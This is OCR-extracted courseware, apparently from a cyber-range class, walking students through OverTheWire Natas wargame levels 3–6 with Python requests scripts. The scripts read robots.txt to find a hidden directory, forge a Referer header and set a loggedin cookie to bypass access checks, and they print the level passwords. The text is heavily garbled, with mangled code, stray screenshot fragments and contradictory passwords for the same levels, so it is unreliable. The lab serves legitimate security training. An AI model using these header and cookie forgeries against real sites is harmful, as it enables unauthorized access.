<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas3", "pass": "sJIJNW6ucpubHPZ1ZAchaDtwd70GrD14" };</script></head>
<body>
<hl>natas3</h1>
<div id="content">
There is nothlng on thlS page
- No more information leaks!! Not even Google will find it this tim
</d1v>
</body></html>

This hint should be easy to understand. If Google is not allowed to spider an application, this is defined
in the robots.txt file. We covered this in earlier lessons. So, we should check to see if the page has a
robot.txt file. From this point forward, build the output will mean you need to press CTRL+B.

e |nthe natas3-4.py file, append the url with /robots. txt, save the file, and then build the
output.

Build output

User-agent: *
Disallow: /s3cr3t/

[Finished in 0.3s]

There seems to be a file that is not allowed to be crawled. Let's navigate to the location in our Python
script.

e Changetheurltohttp://natas3.natas.labs.overthewire.org/s3cr3t, save the file,
and then build the output.
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File Edit Selection Find View Goto Tools Project Preferences Help

4 natas2-3.py

url = 'http://natas3.natas.labs.overthewire.org/s3cr3t’
r = requests.get(url, auth = ('natas3', 'sJIJNW6ucpu6HPZ1ZAchaDtwd70GrD14'))
content = r.text

int content

="/icons/blank.gif" alt="[ICO]" t
f ">Last modified
7C=D;0=A">Description

="[PARENTDIR]" t
d align="right"

users.txt">users.txt
righit"> 40 </

Sublime

Build output - Sublime Text (UNREGISTERED)

r = reques (url, auth
content = r.text

t content

a
</td><td align="right

s.overthewire.org Port 8

[Finished in 469ms]

Natas 3 password: G6ctbMJ5Nb4cbFwhpMPSvxGHhQ716W8Q
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Now

Task

e Changetheurltohttp://natas3.natas.labs.overthewire.org/s3cr3t/users. txt,

save the file, and then build the output.

ild output Build output

natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901SWEZ
requests [Finished in 0.5s]
re
url = 'http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt’
r = requests.get(url, auth = ('natas3', 'sJIINW6ucpu6HPZ1ZAchaDtwd70GrD14'))
content = r.text

print content

/Desktop/natas/natas3-4.py - Sublime Text (UNREGISTERED)

Edit Selection Find View Goto Tools Project Preferences Help

natas3-4.py natas0.py ¥ 4P Build output

natas4:tK0cJIbzM41Ts8hbCmzn5Zr4434fGZQm

t requests 3 [Finished in 358ms]
t re

url http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt
r requests.get(url, auth ('natas3', 'G6ctbMI5SNb4cbFwhpMPSvXGHhQ7I6WSQ" ) )
content = r.text

int content

we have the password for natas4! Be sure to save the script as natas3-4.py.

6: Python Programming Natas 4-5

As completed in previous tasks we want to change the Python code to match our new parameters.

g e g

natas4-5.py

t requests
tre

url = 'http://natas4.natas.1abs.overthew1re.ord‘

r = requests.get(url, auth = ('natas4', 'Z9tkRkWmpt9Qr7XrR5jWRkgOU9O1SwEZ"))

content = r.text

print content

Using the CTRL+SHIFT+S, save the file as natas4-5.py and then build the output.
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Itput Build output

stylesheet" ty "text/css" href="http://natas.labs.overthewire.org/css/

stylesheet" ”http //natas.labs. owerthenlre org/css/jquerw ui.css" />
el="stylesheet" href=
http://natas.labs. ovevtheu1ve ovq/]s/]query 1. 9 1. js
="http://natas.labs.overthewire.org/js/jquery-ui.js
ttp://natas.labs.overthewire.org/js/wechall-data.j
.labs.overthewire.org/ s/uechall js"
'echalllnfo = { "level

"*”content”r

Access disallowed. You are visiting from "" while authorized users should come only
from "http://natas5.natas.labs.overthewire.org/"

othing to do with the level -

jquery-ui.

rth org
= { "level: ™ , "pas 3 n5Zr443416Zom

visiting from ** while authorized users should come only from
rthewire.org/"

href="index.php">Refresh page</a></div>

[Finished in 361ms]

This looks like a header issue. We know this because the site is referring to us visiting from “” which is
null. This means we are missing a referrer in our header. We could fire up BurpSuite and capture the
request and then change the header; however, this is not very efficient and we are already set up in
Python. According to https://2.python-requests.org/en/master/user/quickstart/#custom-headers we
can just add a header request into our script.

>>> url = 'https://api.github.com/some/endpoint
>>>i headers = {'user 'd(]PHt my-app/0.0.1'} |

>>> r = requests.get(url,|headers=headers

source:https://2.python-requests.org/en/master/user/quickstart/#custom-headers

We need a referer header and it needs to come from the specified location.

® |nthe natas4-5.py file, add headers = {'Referer’
'http://natas5.natas.labs.overthewire.org/'} as show in the screenshot below.

e Next,add , headers = headers inside the parentheses as show in the screenshot below,
save the file, then build the output.
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<» natas4-5.py

ort requests
t re

headers = {'Referer’' : 'http://natas5.natas.labs.overthewire.org/'}

url = 'http://natas4.natas.labs.overthewire.org’

r = requests.get(url, auth =('natas4’', 'Z9tkRkWmpt9Qr7XrR5jwWRkgOU901swEZ ), headers = headers )

content = r.text

1t content

="text/css" href="http://natas.labs.overthewire.org/css/
'http://natas.labs.overthewire.org/css/jquery-ui.css"

'http //natas labs overtheu1re org/css/uechall css“ /

ttp //natas labs overtheu1re org/;s/uechall data jss
http //natas labs.overthewire.org/js/wechall.js" t>
r wechallinfo = { "level": "natas4", "pass"
9tkRkaptBOr7XrR5]UngOU9015wEZ“ } 1
="content">

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbalVJcHfq

j="viewsource"> href="index.php">Refresh page

@ Mozilla Firefox B ~/Desktop/natas/natas _a | 19:00 || CyberRange Student [

nt

/Desktop/natas/natas4-5.py - Sublime Text (UNREGISTERED)

. References to
1

t conten ]

granted. The password for natas5 is ZONsrtIkJoKALBCLiSeqFfcRN82Au20D

[Finished in 362ms]

Natas 4 password: tkOclJIbzM4ITs8hbCmzn5Zr4434fGZQm
Let’s narrow this script down even more.

In the natas4-5.py file, comment out print content by adding # before it. This means when
we build the output, this command will be ignored.

Add print re.findall('The password for natas5 is (.*)', content) [0]
below this comment. See image below.

Save the script as natas5-6.py and then build the output.
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4) natas5-6.py

rt requests
t re

headers = {'Referer’' : 'http://natas5.natas.labs.overthewire.org/'}

url = 'http://natas4.natas.labs.overthewire.org’
r = requests.get(url, auth =('natas4', 'Z9tkRkwWmpt9Qr7XrR5jwWRkgOU901swEZ'), headers = headers )

content = r.text

print re.findall('The password for natas5 is (.*)', content) [0]

Natas 5: ZONsrtlkJoKALBCLi5eqFfcRN82Au20D

Build output

fmpN7AY0QGPwtn3fXpbalVlcHfq

[Finished in 1.5s]

And there we have it! The password for natas5.
Task 7: Python Programming Natas 5-6

As completed in previous tasks, we want to change the Python code to match our new parameters. We
also want to comment out the line 16 the print re.findall... and the headers on line 6. We then
want to delete the # (comment) on the print content. We wanttoadda) #online 10. There area
lot of changes in this script, so they are shown in the red boxes in the screenshot below. The # is called
commenting out and can be used for quick changes in the code. Make sure you save the file after
making all the edits.

4 natas5-6.py

t requests
tre

url = 'http://natas5.natas.labs.overthewire.org’

r = requests.get(url, auth =('ngtas5', 'iX6I0fmpN7AYOQGPwtn3fXpbalVlcHfg'))
content = r.text

print content

e Build the output.
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1 output Build output

el="stylesheet" e="text/css" href="http://natas.labs.overthewire.org/css/

'stylesheet"” f="http://natas.labs.overthewire.org/css/jquery-ui.css

'stylesheet" "http://natas.labs.overthewire. org/css/uechall css”
"http://natas.labs.overthewire.org/js/jquery-1.9.1.js"
"http://natas.labs.overthewire.org/js/jquery-ui.js
http://natas.labs.overthewire.org/js/wechall-data.js

//natas.labs.overthewire.org/js/wechall.js
C ar wechallinfo = { "level": "patas5", "pass": "
1X6IOfmpN7AYOOGPutn3prbaJUJchq” 1R >

>natas5</hl
="content">
Access disallowed. You are not logged in

[Finished in 0.4s]

B 8uild output - Sublime

Build output - Sublime Text (UNREGISTERED)

IETF//DTD HTML 2.0//EN">
t requests
t re

url = 'http

r = requests.
content = r.text

. (Ubuntu) Server at natas5.natas.labs.overthewire.org Port 80</address>
t content >

According to the output, we do not have access to the page. This means that the page is using cookies.
Again we could use Burp Suite to capture a request and look at the cookies; however, we can do a quick
check with r.cookies. Take a look at this site for more details on writing Python code and cookies:
https://2.python-requests.org/en/master/user/quickstart/#cookies

® |nthe natas5-6.py file, add print (r.cookies), save the file, and then build the output. See

image below.

<» natas5-6.py

ort requests

url = 'http://natas5.natas.labs.overthewire.org’

requests.get(url, auth =('natas5', 'iX6I0fmpN7AY0QGPwtn3fXpbalVlcHfq'))

content = r.text
nt content

print (r.cookies)
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http //natas labs 0verthew1re OIg/Js/wechall js"s
ipt>var wechallinfo = { "level": "patas5", "pass"
iX6I0OfmpN7AYOQGPwtn3fXpbalVicHfq" };

<hl>natas5</hl
‘ ’v*“content”*
Access disallowed. You are not logged in</

/Desktop/natas/natas5-6.py * - Sublime Text (UNREGISTERED)

natas. Labs. ove
hewire.org/js/
hewire. org

d. You are not logged in</div>

eJar'>[<Cookie loggedin=0 for

It appears that the cookie name is loggedin and it currently =0. It looks like all we need to do is add a
cookie named loggedin and set the value to 1. In the natas5-6.py file, do the following:

e Comment out print (r.cookies).
® Addcookies = {'loggedin' : '1'} under the url.

e Edit the r = requests.get function call by adding in cookies=cookies after url, and exactly as
shown in the below image.

® Addr.cookies = ['loggedin'] underr =requests.get... line 13 in the image below.

e Comment out print content.

e Uncomment the print re.findall line and change natas5 to natasé6.

e add </div> afterthe (/*) inthe print function

e Save the file and then build the output.
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url = 'http://natas5.natas.labs.overthewire.org’
cookies = {'loggedin’ : '1'}

r = requests.get(url, cookies=cookies, auth =('natas5', 'iX6I0fmpN7AYOQGPwtn3fXpbalVlcHfq'))

r.cookies = ['loggedin’]

content = r.text

print re.findall('The password for natas6 is (.*)</div>', content) [0]

There we have it, the level six password.

aGoY4q2Dc6MgDg4oL4YtoKtyAg9PeHal
[Finished in 0.3sﬂ

File Edit Selection Find View Goto Tools Project Preferences Help

4> natas5-6.py natas0.py ) £ 4> Build output
fOIVEOMDtPTgRhgmmvvAOt2EfXR6UQQR
2 [Finished in 356ms]
port requests
port re

url http://natas5.natas.labs.overthewire.org
cookies

r requests.get(url, cookies=cookies, autk ('natas5', 'ZONsrtIkJoKALBCLiSeqFfc
r.cookies = ['loggedin']

content r.text

t re.findall('The password for natas6é is (.*)</div>', content) [0]

Natas 6 password: fOIVEOMDtPTgRhgmmvvAOt2EfXR6uQgR

In this lesson, we learned how to set up and use Sublime Text, and how to use Python to parse
information from a web application. In the process, we gained access to a site by changing the referrer
and we also discovered a cookie session name and modified the cookie to gain access.
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